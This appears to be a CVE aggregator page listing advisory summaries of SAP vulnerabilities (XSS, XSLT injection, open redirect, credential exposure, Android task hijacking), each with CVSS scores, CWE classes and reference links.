CVSS: 4.8EPSS: 0%CPEs: 7EXPL: 0CVE-2021-21489
https://notcve.org/view.php?id=CVE-2021-21489
14 Sep 2021 — SAP NetWeaver Enterprise Portal versions - 7.10, 7.11, 7.20, 7.30, 7.31, 7.40, 7.50, does not sufficiently encode user related data, resulting in Stored Cross-Site Scripting (XSS) vulnerability. This would allow an attacker with administrative privileges to store a malicious script on the portal. The execution of the script content by a victim registered on the portal could compromise the confidentiality and integrity of portal content. SAP NetWeaver Enterprise Portal versiones - 7.10, 7.11, 7.20, 7.30, 7.3... • https://launchpad.support.sap.com/#/notes/3082219 • CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') •
CVSS: 9.9EPSS: 4%CPEs: 6EXPL: 0CVE-2021-37531 – SAP Enterprise Portal XSLT Injection
https://notcve.org/view.php?id=CVE-2021-37531
14 Sep 2021 — SAP NetWeaver Knowledge Management XML Forms versions - 7.10, 7.11, 7.30, 7.31, 7.40, 7.50, contains an XSLT vulnerability which allows a non-administrative authenticated attacker to craft a malicious XSL stylesheet file containing a script with OS-level commands, copy it into a location to be accessed by the system and then create a file which will trigger the XSLT engine to execute the script contained within the malicious XSL file. This can result in a full compromise of the confidentiality, integrity, a... • http://packetstormsecurity.com/files/165751/SAP-Enterprise-Portal-XSLT-Injection.html • CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') •
CVSS: 6.5EPSS: 0%CPEs: 2EXPL: 0CVE-2021-38150
https://notcve.org/view.php?id=CVE-2021-38150
14 Sep 2021 — When an attacker manages to get access to the local memory, or the memory dump of a victim, for example by a social engineering attack, SAP Business Client versions - 7.0, 7.70, will allow him to read extremely sensitive data, such as credentials. This would allow the attacker to compromise the corresponding backend for which the credentials are valid. Cuando un atacante consigue acceder a la memoria local, o al volcado de memoria de una víctima, por ejemplo mediante un ataque de ingeniería social, SAP Busi... • https://launchpad.support.sap.com/#/notes/3060621 • CWE-312: Cleartext Storage of Sensitive Information •
CVSS: 4.3EPSS: 0%CPEs: 1EXPL: 0CVE-2021-33706
https://notcve.org/view.php?id=CVE-2021-33706
10 Aug 2021 — Due to improper input validation in InfraBox, logs can be modified by an authenticated user. Debido a una inapropiada comprobación de entradas en InfraBox, los registros pueden ser modificados por un usuario autenticado • https://github.com/SAP/InfraBox/security/advisories/GHSA-gw7h-9xvm-83qh • CWE-20: Improper Input Validation •
CVSS: 8.3EPSS: 0%CPEs: 7EXPL: 0CVE-2021-33702 – SAP Enterprise Portal NavigationReporter Cross Site Scripting
https://notcve.org/view.php?id=CVE-2021-33702
10 Aug 2021 — Under certain conditions, NetWeaver Enterprise Portal, versions - 7.10, 7.11, 7.20, 7.30, 7.31, 7.40, 7.50, does not sufficiently encode report data. An attacker can craft malicious data and print it to the report. In a successful attack, a victim opens the report, and the malicious script gets executed in the victim's browser, resulting in a Stored Cross-Site Scripting (XSS) vulnerability. En determinadas condiciones, NetWeaver Enterprise Portal, versiones - 7.10, 7.11, 7.20, 7.30, 7.31, 7.40, 7.50, no cod... • http://packetstormsecurity.com/files/165737/SAP-Enterprise-Portal-NavigationReporter-Cross-Site-Scripting.html • CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') •
CVSS: 8.3EPSS: 0%CPEs: 4EXPL: 0CVE-2021-33703 – SAP Enterprise Portal RunContentCreation Cross Site Scripting
https://notcve.org/view.php?id=CVE-2021-33703
10 Aug 2021 — Under certain conditions, NetWeaver Enterprise Portal, versions - 7.30, 7.31, 7.40, 7.50, does not sufficiently encode URL parameters. An attacker can craft a malicious link and send it to a victim. A successful attack results in Reflected Cross-Site Scripting (XSS) vulnerability. Bajo determinadas condiciones, NetWeaver Enterprise Portal, versiones - 7.30, 7.31, 7.40, 7.50, no codifica suficientemente los parámetros de la URL. Un atacante puede diseñar un enlace malicioso y enviarlo a la víctima. • http://packetstormsecurity.com/files/165740/SAP-Enterprise-Portal-RunContentCreation-Cross-Site-Scripting.html • CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') •
CVSS: 6.1EPSS: 0%CPEs: 4EXPL: 0CVE-2021-33707 – SAP Enterprise Portal Open Redirect
https://notcve.org/view.php?id=CVE-2021-33707
10 Aug 2021 — SAP NetWeaver Knowledge Management allows remote attackers to redirect users to arbitrary websites and conduct phishing attacks via a URL stored in a component. This could enable the attacker to compromise the user's confidentiality and integrity. SAP NetWeaver Knowledge Management, permite a atacantes remotos redirigir a usuarios a sitios web arbitrarios y conducir ataques de phishing por medio de una URL almacenada en un componente. Esto podría permitir al atacante comprometer la confidencialidad e integr... • http://packetstormsecurity.com/files/165748/SAP-Enterprise-Portal-Open-Redirect.html • CWE-601: URL Redirection to Untrusted Site ('Open Redirect') •
CVSS: 7.6EPSS: 0%CPEs: 1EXPL: 1CVE-2021-33699
https://notcve.org/view.php?id=CVE-2021-33699
10 Aug 2021 — Task Hijacking is a vulnerability that affects the applications running on Android devices due to a misconfiguration in their AndroidManifest.xml with their Task Control features. This allows an unauthorized attacker or malware to takeover legitimate apps and to steal user's sensitive information. Task Hijacking, es una vulnerabilidad que afecta a las aplicaciones que se ejecutan en dispositivos Android debido a una mala configuración en el archivo AndroidManifest.xml con sus funciones de Task Control. Esto... • https://github.com/naroSEC/CVE-2021-33699_Task_Hijacking •
CVSS: 5.5EPSS: 0%CPEs: 1EXPL: 0CVE-2015-7731
https://notcve.org/view.php?id=CVE-2015-7731
09 Aug 2021 — SAP Mobile Platform 3.0 SP05 ClientHub allows attackers to obtain the keystream and other sensitive information via the DataVault, aka SAP Security Note 2094830. SAP Mobile Platform versión 3.0 SP05 ClientHub, permite a atacantes obtener el keystream y otra información confidencial por medio de DataVault, también se conoce como SAP Security Note 2094830 • https://seclists.org/bugtraq/2015/Aug/39 • CWE-200: Exposure of Sensitive Information to an Unauthorized Actor •
CVSS: 5.4EPSS: 0%CPEs: 1EXPL: 0CVE-2021-33682
https://notcve.org/view.php?id=CVE-2021-33682
14 Jul 2021 — SAP Lumira Server version 2.4 does not sufficiently encode user controlled inputs, resulting in Cross-Site Scripting (XSS) vulnerability. This would allow an attacker with basic level privileges to store a malicious script on SAP Lumira Server. The execution of the script content, by a victim registered on SAP Lumira Server, could compromise the confidentiality and integrity of SAP Lumira content. SAP Lumira Server versión 2.4, no codifica suficientemente las entradas controladas por el usuario, resultando ... • https://launchpad.support.sap.com/#/notes/3053403 • CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') •